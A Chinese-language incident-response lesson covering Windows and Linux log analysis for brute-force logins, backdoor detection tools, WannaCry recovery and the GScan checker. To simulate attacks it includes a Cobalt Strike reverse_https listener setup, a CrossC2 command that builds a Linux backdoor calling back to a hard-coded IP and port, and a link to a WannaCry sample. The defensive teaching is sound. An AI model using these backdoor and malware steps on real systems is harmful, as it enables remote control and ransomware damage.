74:應急響應-win&linux分析后門&勒索病毒&攻擊


操作系統(windows,linux)應急響應:

  • 1.常見危害:暴力破解,漏洞利用,流量攻擊,木馬控制(Webshell,PC 木馬等),病毒感染(挖礦,蠕蟲,勒索等)
  • 2.常見分析:計算機賬戶,端口,進程,網絡,啟動,服務,任務,文件等安全問題

常見日志類別及存儲:

  • Windows,Linux

補充資料:

  • https://xz.aliyun.com/t/485 應急響應大合集
  • https://www.secpulse.com/archives/114019.html 最全Windows安全工具錦集
  • https://docs.microsoft.com/en-us/sysinternals/ windows官方工具

病毒分析:

  • PCHunter:http://www.xuetr.com
  • 火絨劍:https://www.huorong.cn
  • Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
  • processhacker:https://processhacker.sourceforge.io/downloads.php
  • autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
  • OTL:https://www.bleepingcomputer.com/download/otl/
  • SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector

病毒查殺:

  • 卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
  • 大蜘蛛:http://free.drweb.ru/download+cureit+free
  • 火絨安全軟件:https://www.huorong.cn
  • 360 殺毒:http://sd.360.cn/download_center.html

病毒動態:

  • CVERC-國家計算機病毒應急處理中心:http://www.cverc.org.cn
  • 微步在線威脅情報社區:https://x.threatbook.cn
  • 火絨安全論壇:http://bbs.huorong.cn/forum-59-1.html
  • 愛毒霸社區:http://bbs.duba.net
  • 騰訊電腦管家:http://bbs.guanjia.qq.com/forum-2-1.html

在線病毒掃描網站:

  • http://www.virscan.org //多引擎在線病毒掃描網
  • https://habo.qq.com //騰訊哈勃分析系統
  • https://virusscan.jotti.org //Jotti 惡意軟件掃描系統
  • http://www.scanvir.com //計算機病毒、手機病毒、可疑文件分析

本課重點:

  • 案例1:攻擊響應-暴力破解(RDP,SSH)-Win,Linux
  • 案例2:控制響應-后門木馬(Webshell,PC)-Win,Linux
  • 案例3:危害響應-病毒感染(勒索 WannaCry)-Windows
  • 案例4:自動化響應檢測-Gscan 多重功能腳本測試-Linux

案例1:攻擊響應-暴力破解(RDP,SSH)-Win,Linux

Windows-LogFusion 載入查看:
事件歸類,事件 ID,事件狀態等,參考百度資料

Linux-grep 篩選:
1、統計了下日志,確認服務器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c

2、輸出登錄爆破的第一行和最后一行,確認爆破時間范圍:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -1

3、進一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr

4、爆破用戶名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

5、登錄成功的日期、用戶名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

案例演示1-windows日志查看

windows日志位置

windows自帶日志工具不好用,查找分析不方便,推薦使用插件LogFusion

<1>LogFusion載入應用程序、硬件事件、安全、系統等日志

<2>使用弱口令工具進行暴力破解(選擇RDP協議),模擬攻擊

<3>在安全日志里看到很多賬戶登錄失敗的日志,可以判斷當前主機遭受了爆破攻擊,以及是否成功等

<4>雙擊進入,查看詳細信息(可以看到是哪個IP地址爆破密碼成功,成功登錄了本機)

案例演示2-linux日志查看

linux日志位置

<1>首先使用弱口令工具進行暴力破解(選擇SSH協議),模擬攻擊

<2>linux日志分析,使用grep篩選

案例2:控制響應-后門木馬(Webshell,PC)-Win,Linux

windows:默認配置測試
linux 借助 CrossC2 項目:netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
參考過程:http://www.adminxe.com/1287.html

CS借助CrossC2項目上線linux主機過程:
1.項目上傳至服務端目錄,給予執行權限

2.配置監聽器:
windows/beacon_https/reverse_https 阿里雲記得端口放行

3.生成后門:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通過網絡監聽工具及 windows 日志分析或執行記錄查找后門問題

案例演示1-windows分析

<1>windows執行木馬,CS上線,模擬攻擊

<2>TCPView工具,可以查看哪個進程與遠程IP通信過,從而確定系統是否曾經遭受過攻擊。但是這個軟件不太好用,上一步執行過的artifact.exe木馬都沒篩選出來。

<3>Process Explorer工具,可以查看分析進程

<4>PCHunter工具。缺點是,windows高版本網絡信息,獲取不全。比如木馬在windows7執行后,該工具可以獲取網絡信息,如下圖。但是同一木馬在windows2018執行后,該工具獲取不到網絡信息。

<5>UserAssistView工具,可以看到所有在windows系統上執行過的文件

<6>logonsession工具,可以看到當前主機有哪些會話連接過,從而分析有沒有過遠程攻擊

<7>autoruns工具,可以查看windows系統的自啟動項目,從而發現是否有木馬病毒等

案例演示2-linux分析

CS是windows滲透工具,但是后期經過一些插件的開發,CS也可以上線linux系統,比如CS借助CrossC2項目上線linux主機

<1>項目上傳至服務端目錄,給予執行權限

<2>配置監聽器:windows/beacon_https/reverse_https 阿里雲記得端口放行

<3>生成后門:./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2

<4>將后門上傳到linux主機並執行

<5>CS成功上線

<6>接下來就是分析日志,查找后門等,具體可見案例4。

案例3:危害響應-病毒感染(勒索 WannaCry)-Windows

詳細說明中毒表現及恢復指南
推薦2個勒索病毒解密網站
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
[下載]永恆之藍樣本(勒索病毒): https://bbs.pediy.com/thread-217586-1.htm

案例演示

<1>下載勒索病毒樣本,在虛擬機上執行(不要在本機執行,謹慎執行)

<2>中毒后顯示如下

<3>打開任何文件都亂碼,彈框

<4>可以使用360勒索病毒解密網站進行病毒查詢、在線解密等。

<5>也可以使用nomoreransom網站嘗試解密。

案例4:自動化響應檢測-Gscan 多重功能腳本測試-Linux

參考:https://github.com/grayddq/GScan/
自動化響應檢測工具:GScan、chkrootkit、rkhunter、lynis
都下載一下,應急響應時全都跑一遍

案例演示

<1>執行Gscan腳本

 

<2>可以看到,黑客進行了哪些攻擊行為,是否成功等。

<3>netstat -ntl可以查看tcp端口等,再通過ps命令找到對應的進程,分析其是否是木馬病毒


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM